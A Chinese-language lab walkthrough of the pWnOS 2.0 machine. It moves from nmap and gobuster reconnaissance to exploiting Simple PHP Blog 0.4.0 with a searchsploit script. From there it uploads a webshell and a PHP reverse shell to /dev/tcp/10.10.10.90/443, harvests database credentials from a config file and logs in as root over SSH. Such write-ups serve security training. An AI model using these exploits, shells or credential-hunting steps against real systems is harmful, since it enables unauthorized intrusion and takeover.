pWnOS2.0

1、主机发现

1. 主机发现

   ┌──(de1te㉿de1te)-[~]└─$ sudo nmap -sn 10.10.10.0/24  [sudo] de1te 的密码：Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-07 10:00 CSTNmap scan report for 10.10.10.1Host is up (0.00055s latency).MAC Address: 00:50:56:C0:00:08 (VMware)Nmap scan report for 10.10.10.15Host is up (0.000050s latency).MAC Address: 00:50:56:FD:40:27 (VMware)Nmap scan report for 10.10.10.100Host is up (0.00010s latency).MAC Address: 00:0C:29:5F:8B:AA (VMware)Nmap scan report for 10.10.10.254Host is up (0.00014s latency).MAC Address: 00:50:56:ED:BE:4A (VMware)Nmap scan report for 10.10.10.90Host is up.Nmap done: 256 IP addresses (5 hosts up) scanned in 1.82 seconds

   • 靶机地址为：10.10.10.100

2、端口扫描

1. 开放端口扫描

   ┌──(de1te㉿de1te)-[~]└─$ sudo nmap --min-rate 10000  -p- 10.10.10.100Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-07 10:03 CSTNmap scan report for 10.10.10.100Host is up (0.00010s latency).Not shown: 65533 closed tcp ports (reset)PORT   STATE SERVICE22/tcp open  ssh80/tcp open  httpMAC Address: 00:0C:29:5F:8B:AA (VMware)Nmap done: 1 IP address (1 host up) scanned in 1.88 seconds

   • 开放了22,80端口

2. 扫描开放端口的服务及版本

   
   (资料图片仅供参考)

   ┌──(de1te㉿de1te)-[~]└─$ sudo nmap -sT -sV -O  -p22,80 10.10.10.100                                                                                                                                                                                             Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-07 10:04 CSTNmap scan report for 10.10.10.100Host is up (0.00049s latency).PORT   STATE SERVICE VERSION22/tcp open  ssh     OpenSSH 5.8p1 Debian 1ubuntu3 (Ubuntu Linux; protocol 2.0)80/tcp open  http    Apache httpd 2.2.17 ((Ubuntu))MAC Address: 00:0C:29:5F:8B:AA (VMware)Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed portDevice type: general purposeRunning: Linux 2.6.XOS CPE: cpe:/o:linux:linux_kernel:2.6OS details: Linux 2.6.32 - 2.6.39Network Distance: 1 hopService Info: OS: Linux; CPE: cpe:/o:linux:linux_kernelOS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .Nmap done: 1 IP address (1 host up) scanned in 8.66 seconds

   • 常规情况下，扫两次。防止网络问题影响结果。

   UDP扫描

   ┌──(de1te㉿de1te)-[~]└─$ sudo nmap -sU  -p22,80 10.10.10.100 Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-07 10:06 CSTNmap scan report for 10.10.10.100Host is up (0.00024s latency).PORT   STATE  SERVICE22/udp closed ssh80/udp closed httpMAC Address: 00:0C:29:5F:8B:AA (VMware)Nmap done: 1 IP address (1 host up) scanned in 0.19 seconds                                                             

3. 常见漏洞扫描

   ┌──(de1te㉿de1te)-[~]└─$ sudo nmap -script=vuln  -p22,80 10.10.10.100 Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-07 10:07 CSTPre-scan script results:| broadcast-avahi-dos: |   Discovered hosts:|     224.0.0.251|   After NULL UDP avahi packet DoS (CVE-2011-1002).|_  Hosts are all up (not vulnerable).Nmap scan report for 10.10.10.100Host is up (0.00031s latency).PORT   STATE SERVICE22/tcp open  ssh80/tcp open  http| http-enum: |   /blog/: Blog|   /login.php: Possible admin folder|   /login/: Login page|   /info.php: Possible information file|   /icons/: Potentially interesting folder w/ directory listing|   /includes/: Potentially interesting directory w/ listing on "apache/2.2.17 (ubuntu)"|   /index/: Potentially interesting folder|   /info/: Potentially interesting folder|_  /register/: Potentially interesting folder|_http-dombased-xss: Couldn"t find any DOM based XSS.|_http-stored-xss: Couldn"t find any stored XSS vulnerabilities.| http-csrf: | Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=10.10.10.100|   Found the following possible CSRF vulnerabilities: |     |     Path: http://10.10.10.100:80/register.php|     Form id: |     Form action: register.php|     |     Path: http://10.10.10.100:80/login.php|     Form id: |_    Form action: login.php|_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)| http-cookie-flags: |   /: |     PHPSESSID: |       httponly flag not set|   /login.php: |     PHPSESSID: |       httponly flag not set|   /login/: |     PHPSESSID: |       httponly flag not set|   /index/: |     PHPSESSID: |       httponly flag not set|   /register/: |     PHPSESSID: |_      httponly flag not setMAC Address: 00:0C:29:5F:8B:AA (VMware)Nmap done: 1 IP address (1 host up) scanned in 55.66 seconds

总结：开放了22，80端口，我们可以尝试从80端口出发。服务器内核版本较低。

3、Web渗透

1. 目录爆破

   ┌──(de1te㉿de1te)-[~]└─$ sudo gobuster dir -u http://10.10.10.100 -w /usr/share/seclists/Discovery/Web-Content/raft-large-directories.txt ===============================================================Gobuster v3.5by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)===============================================================[+] Url:                     http://10.10.10.100[+] Method:                  GET[+] Threads:                 10[+] Wordlist:                /usr/share/seclists/Discovery/Web-Content/raft-large-directories.txt[+] Negative Status codes:   404[+] User Agent:              gobuster/3.5[+] Timeout:                 10s===============================================================2023/04/07 10:24:38 Starting gobuster in directory enumeration mode===============================================================/includes             (Status: 301) [Size: 315] [--> http://10.10.10.100/includes/]/register             (Status: 200) [Size: 1562]/login                (Status: 200) [Size: 1174]/blog                 (Status: 301) [Size: 311] [--> http://10.10.10.100/blog/]/info                 (Status: 200) [Size: 49871]/index                (Status: 200) [Size: 854]/activate             (Status: 302) [Size: 0] [--> http://10.10.10.100/index.php]/server-status        (Status: 403) [Size: 293]Progress: 21892 / 62285 (35.15%)[ERROR] 2023/04/07 10:24:42 [!] parse "http://10.10.10.100/error\x1f_log": net/url: invalid control character in URL/index                (Status: 200) [Size: 854]Progress: 61574 / 62285 (98.86%)===============================================================2023/04/07 10:24:48 Finished===============================================================

2. 浏览网页

   80端口

   里面有个login，但是手工注入发现不行

   http://10.10.10.100/includes/

   有config文件，但是我们下载下来，里面是空的

   http://10.10.10.100/blog/index.php

   • 上面说是Simple PHP Blog 0.4.0
   • 简单搜索了一下，发现是一个简单的博客系统。看看有啥漏洞没

   ┌──(de1te㉿de1te)-[~]└─$ searchsploit simple php blog----------------------------------------------------------------------------------- --------------------------------- Exploit Title                                                                     |  Path----------------------------------------------------------------------------------- ---------------------------------Insanely Simple Blog 0.4/0.5 - "index.php" SQL Injection                           | php/webapps/30317.txtInsanely Simple Blog 0.4/0.5 - Cross-Site Scripting                                | php/webapps/30318.txtInsanely Simple Blog 0.5 - SQL Injection                                           | php/webapps/5774.txtSimple Blog PHP 2.0 - Multiple Vulnerabilities                                     | php/webapps/40518.txtSimple Blog PHP 2.0 - SQL Injection                                                | php/webapps/40519.txtSimple PHP Blog (SPHPBlog) 0.5.1 - Code Execution                                  | php/webapps/6311.phpSimple PHP Blog (sPHPblog) 0.5.1 - Multiple Vulnerabilities                        | php/webapps/4557.txtSimple PHP Blog 0.4 - "colors.php" Multiple Cross-Site Scripting Vulnerabilities   | cgi/webapps/26463.txtSimple PHP Blog 0.4 - "preview_cgi.php" Multiple Cross-Site Scripting Vulnerabilit | cgi/webapps/26461.txtSimple PHP Blog 0.4 - "preview_static_cgi.php" Multiple Cross-Site Scripting Vulne | cgi/webapps/26462.txtSimple PHP Blog 0.4.0 - Multiple Remote s                                          | php/webapps/1191.plSimple PHP Blog 0.4.0 - Remote Command Execution (Metasploit)                      | php/webapps/16883.rbSimple PHP Blog 0.4.7.1 - Remote Command Execution                                 | php/webapps/1581.plSimple PHP Blog 0.5.1 - Local File Inclusion                                       | php/webapps/10604.plSimple PHP Blog 0.5.x - "search.php" Cross-Site Scripting                          | php/webapps/33507.txtSimple PHP Blog 0.8.4 - Cross-Site Request Forgery (Add Admin)                     | php/webapps/40475.txtSimpleBlog 2.0 - "comments.asp" SQL Injection (2)                                  | php/webapps/2232.plSimpleBlog 3.0 - Database Disclosure                                               | php/webapps/7232.txtSuper Simple Blog Script 2.5.4 - "entry" SQL Injection                             | php/webapps/9180.txtSuper Simple Blog Script 2.5.4 - Local File Inclusion                              | php/webapps/9179.txt----------------------------------------------------------------------------------- ---------------------------------

   • 确实存在漏洞

   searchexploit -m 1191

   • 下载文件1191.pl

   使用说明·

   • 感觉可以利用的东西很多啊

   1. 方式一：

      perl 1191.pl -h http://10.10.10.100/blog -e 1  

      上传的cmd文件，就是一个简单的一句话木马

   2. 方式二

      perl 1191.pl -h http://10.10.10.100/blog/ -e 3 -U 123 -P 123   

      就可成功登陆后台

      有一个上传照片的地方，看看能不能上传其他文件

      & /dev/tcp/10.10.10.90/443 0>&1"") ?>  

      上传成功了

   总结两种方法都是可以的，最终实现的方法还是将文件上传到images的文件夹下

4、提权

我们刚刚通过simple php blog 漏洞上传了我们的反弹shell

sudo nc -lvnp 443 # 开启443端口监听

www-data@web:/var/www/blog/images$ whoamiwhoamiwww-datawww-data@web:/var/www/blog/images$ sudo -lsudo -lsudo: no tty present and no askpass program specified

没有tty，看看有没有安装python

dpkg -l

python -c "import pty;pty.spawn("/bin/bash")"

www-data@web:/var/www/blog/images$ sudo -lsudo -l[sudo] password for www-data: Sorry, try again.[sudo] password for www-data: daSorry, try again.[sudo] password for www-data: daSorry, try again.sudo: 3 incorrect password attempts

• 我们不知道密码

到目前为止一切准备就绪，就开始提权了。emm，看看有没有敏感文件泄露吧

www-data@web:/var/www/blog$ cd ..cd ..www-data@web:/var/www$ lslsactivate.php  includes   info.php   mysqli_connect.phpblog          index.php  login.php  register.phpwww-data@web:/var/www$ cat mysqli_connect.phpcat mysqli_connect.php

• username : root password:goodday

尝试一下

www-data@web:/var/www$ mysql -u root -p mysql -u root -p Enter password: gooddayERROR 1045 (28000): Access denied for user "root"@"localhost" (using password: YES)

密码不正确？！！！

但是，这个web服务还是开启的。说明，肯定有一个地方是存在真正的配置文件的

www-data@web:/var/www$ cd ..cd ..www-data@web:/var$ lslsbackups  crash       lib    lock  mail                opt  spool  uploadscache    index.html  local  log   mysqli_connect.php  run  tmp    wwwwww-data@web:/var$ cat mysqli_connect.phpcat mysqli_connect.php

• 果然！！！

ssh连接一下

┌──(de1te㉿de1te)-[~]└─$ sudo ssh root@10.10.10.100                       root@10.10.10.100"s password: Welcome to Ubuntu 11.04 (GNU/Linux 2.6.38-8-server x86_64) * Documentation:  http://www.ubuntu.com/server/doc  System information as of Fri Apr  7 02:15:10 EDT 2023  System load:  0.0               Processes:           82  Usage of /:   2.9% of 38.64GB   Users logged in:     0  Memory usage: 26%               IP address for eth0: 10.10.10.100  Swap usage:   0%  Graph this data and manage this system at https://landscape.canonical.com/Last login: Mon May  9 19:29:03 2011root@web:~#    

定妆照：

root@web:~# whoamirootroot@web:~# ip a                                                                                                                                                                                                 1: lo:  mtu 16436 qdisc noqueue state UNKNOWN     link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00    inet 127.0.0.1/8 scope host lo    inet6 ::1/128 scope host        valid_lft forever preferred_lft forever2: eth0:  mtu 1500 qdisc pfifo_fast state UP qlen 1000    link/ether 00:0c:29:5f:8b:aa brd ff:ff:ff:ff:ff:ff    inet 10.10.10.100/24 brd 10.10.10.255 scope global eth0    inet6 fe80::20c:29ff:fe5f:8baa/64 scope link        valid_lft forever preferred_lft foreverroot@web:~# id uid=0(root) gid=0(root) groups=0(root)root@web:~# sudo -l Matching Defaults entries for root on this host:    env_resetUser root may run the following commands on this host:    (ALL : ALL) ALL